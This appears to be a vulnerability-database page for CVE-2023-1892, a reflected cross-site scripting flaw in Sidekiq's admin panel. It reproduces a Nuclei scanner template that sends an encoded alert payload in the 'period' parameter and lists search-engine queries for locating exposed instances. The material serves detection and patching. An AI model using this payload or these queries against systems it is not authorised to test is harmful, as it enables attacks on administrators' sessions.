Lucene search
+L

Sidekiq < 7.0.8 - Cross-Site Scripting

🗓️ 19 Aug 2026 04:15:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

Sidekiq < 7.0.8 - XSS vulnerability in admin panel can pose serious risks

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2023-1892
21 Apr 202312:37
circl
cnnvd
CNNVD
sidekiq 跨站脚本漏洞
21 Apr 202300:00
cnnvd
cve
CVE
CVE-2023-1892
5 Apr 202300:00
cve
cvelist
Cvelist
CVE-2023-1892 Cross-site Scripting (XSS) - Reflected in sidekiq/sidekiq
5 Apr 202300:00
cvelist
debiancve
Debian CVE
CVE-2023-1892
5 Apr 202300:00
debiancve
huntr
Huntr
Reflected XSS on Sidekiq through multiples endpoints via GET parameter "period"
2 Apr 202321:39
huntr
github
Github Security Blog
sidekiq vulnerable to cross-site scripting
21 Apr 202306:30
github
nvd
NVD
CVE-2023-1892
21 Apr 202305:15
nvd
osv
OSV
GHSA-H3R8-H5QW-4R35 sidekiq vulnerable to cross-site scripting
21 Apr 202306:30
osv
osv
OSV
UBUNTU-CVE-2023-1892
21 Apr 202305:15
osv
Rows per page
id: CVE-2023-1892

info:
  name: Sidekiq < 7.0.8 - Cross-Site Scripting
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the period parameter in Sidekiq metrics endpoints, potentially stealing administrator session cookies and accessing sensitive job queue information and worker statistics.
  remediation: |
    Update Sidekiq to version 7.0.8 or later that properly sanitizes the period parameter and encodes output in the metrics dashboard.
  reference:
    - https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777
    - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1892
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2023-1892
    cwe-id: CWE-79
    epss-score: 0.02742
    epss-percentile: 0.84922
    cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: contribsys
    product: sidekiq
    shodan-query: http.title:"sidekiq"
    fofa-query:
      - title="Sidekiq"
      - title="sidekiq"
    google-query: intitle:"sidekiq"
  tags: cve,cve2023,sidekiq,contribsys,xss,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/queues"

    matchers:
      - type: word
        internal: true
        part: body
        words:
          - "Sidekiq"
          - "Dashboard</a>"
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
      - "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
      - "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src/onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a0046304402201d395c27c7a066ee3f6ed2cba84da4d9c196cd6869db55bc23557e40c4d45b0f0220657bda204df61f5e51acdefadb9cb3ed456aa5044dc51157934abff415420953:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.19.6
CVSS 38.3
EPSS0.02742
SSVC
61